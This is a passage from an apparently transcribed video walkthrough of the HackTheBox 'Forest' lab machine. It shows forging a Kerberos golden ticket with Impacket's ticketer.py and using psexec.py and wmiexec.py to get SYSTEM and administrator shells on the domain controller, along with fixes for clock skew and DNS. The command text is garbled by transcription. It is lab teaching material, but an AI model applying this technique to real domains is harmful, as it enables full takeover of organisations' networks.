thing. So let's see, it's probably got UTC time, but it's in Eastern or -7. I don't know what's happening, but let's just change our date. Date-s, we'll try 4 hours earlier. So this will be 10:24:37. And we will rerun this. Date. We'll try 12:14:18. Rerun this. There we go. So it's skewed in the other way. Nope. Let's do nmap again. nmap-p 445-sc sv 10.10.10.161. So this should get us the clock skew, I think. Host script results. Maybe not. Oh, it did. Sweet. So we are now 1 hour off. So date, or I don't understand how this you know what the easy way to do is? Go here, type date, 11:34 a.m. And we have 6:25 EDT. So let's do date -s. This will be 17:34. Let's try this. Skew too great. Rerun this Nmap script and we'll see. 16. I probably shouldn't be changing this while running Nmap. 15. 11. Is it March 18th on the server? It is. So for INSEC 0 to 24, do echo I. Done. Okay. So we'll do date -s I, probably 36 now, and then the PSEXEC. We will get this working eventually. One of those was a different error message. O236. Server not found in Kerberos database. Date -s 1436. Okay, so that's right. Not sure why this is erroring. Let's see, domain name. Ticketer. Let's try hdb.local in caps. Server not found in Kerberos database. Let's Google this error message. Before we do that, let's just try domain HTTP. The Etsy host HTTP. Client not found. Oh. This is probably some weird, like, Kerberos configuration thing. Let's see. Golden ticket, ticketer, .py. We just went there. let's see. Ticket.py, nt hash, domain sid, domain, administrator. Let's just try not being fancy and doing administrator. So domain sid, we'll do htb.local administrator. It's very possible that domain controllers will validate usernames, but workstations won't, maybe. Unlikely, but possible. Administrator. htb.local administrator. Server not found. V etc resolve.conf. Name server 10.10.10.161. etc host. Let's delete that. Ping htb.local. Ping htb. Ping-n1 htb.local. The etc resolve.conf 10.10.10 should work. I don't know why my system's not registering that. Do I have a typo? No, I don't. The etc host 10.10.10.161 htb.local. Why is it always the easy things that fail? Okay. Execute PSEXEC k-n full domain -k no pass. Kerberos let's see, http.local administrator. Let's see. We probably have to edit our v etc Kerberos file. Which do I not even have one? I thought it was like krb5.conf. Oh, because I edited my resolve.conf. I don't have DNS. This is just failing all over the place. 8888. What is this? Impacket. Kerberos auth not working. Solve this. Sure enough, specifying the FQDN of the domain in the command solves the whole issue. We can add -debug. Trying to connect KDC. Let's just try updating Impacket. App search Impacket. Apt install don't know which one to install between Python 3-Impacket and Impacket Scripts. I'm just going to do the bad option, and we're just going to reinstall Impacket and not use the repository and just hope we don't brick anything. Impacket git clone. I definitely would not recommend doing this without like a snapshot or something. So if we look, we don't have PSEXEC.py on our path. We're going to do Python 3 setup.py install and hope for the best. So now we have PSEXEC.py in our path. So what we can do is locate PSEXEC grep example. Oh, here it is. That's what I want. And we can go cd root HTTP boxes forest cp the administrator thing here. And we just do psexec.py-k-no pass http.local administrator at 10.10.10.161. And at least we're a full revision up. The etc host. It's there. Let's add that debug. http.local/administrator at 10.10.10.161. Ping 10.10.10.161. Let's restart VPN. Okay. That was weird. And we still can't. Clock skew. Date. We are 11:54. Okay, server not found in Kerberos database. Oh, that's probably because we're doing IP address. So maybe this is the Kerberos database on the remote server, and the box's name is forest, and we can also do HTTP. Let's try this. That's better. So Impacket wants DNS name. That took a lot longer to figure out than I care. So now if we do, we're administrator on the, we're probably local system on the server because we use PSEXEC. I bet if we use WMIExec, we'll be administrator. Who am I? Yeah, we're system. Let's do WMIExec. So PSEXEC on the Impacket version is always going to be system. But now WMIExec, we're administrator. Let us do that totally does not exist. CP totally doesn't exist. And we can export is equal to this. And we can see if we can make ourselves say we're this user. Okay. Moment of truth. Client not found. So I don't think we actually can do that on domain controller. Put KRB5 CC name totally does not exist .ccache. Let's just do the ticketer again and get a new ticket with the new timestamp to double validate, but I'm guessing on domain controllers you can't. Impacket grep. What do I want to grep for example? CD here. So ticketer does not exist. And we can export this to does not exist. PSEXEC does not exist at forest. It works. So I wonder if before that ticket we had, we were doing like not fully qualified domain name, because that would definitely affect it. So let's do WMIExec. Come on. And ESPN is true. Just worked for PSEXEC. Come on. Maybe it doesn't work on WMIExec with invalid user. So host and ESPN true. Ping http.local. We're pinging it. Let's see. Let's copy does not exist to HTTP boxes forest. Go there. And run this version of WMIExec. This is the latest version. Instead of using the one out of that one directory. Still has the issue. But PSEXEC doesn't. Weird. Wait. Yeah. Query user. No usernames. We're your system. I'm actually confused why WMIExec doesn't work. But it's been repeated. Doesn't work for some reason. PSEXEC does with this. Probably some type of Impacket bug. I bet if we're on Windows, we could get a PSEXEC session as a user that does not exist. But for some reason, using Impacket, we can't. And the reason for the PSEXEC working on Windows is because PSEXEC doesn't always impersonate the service. I don't know if that's a flag here. Binary name, service name, yeah. So, PSEXEC on Linux always would put you as the system user. It doesn't have the option to not impersonate the user you logged in as. But that'll be the box. Hope you enjoyed this last part. I know it was frustrating. It was frustrating for me too. But at least now you should know how to do golden ticketing on Linux and some common issues you may run into. Take care all. I'll see you all next week.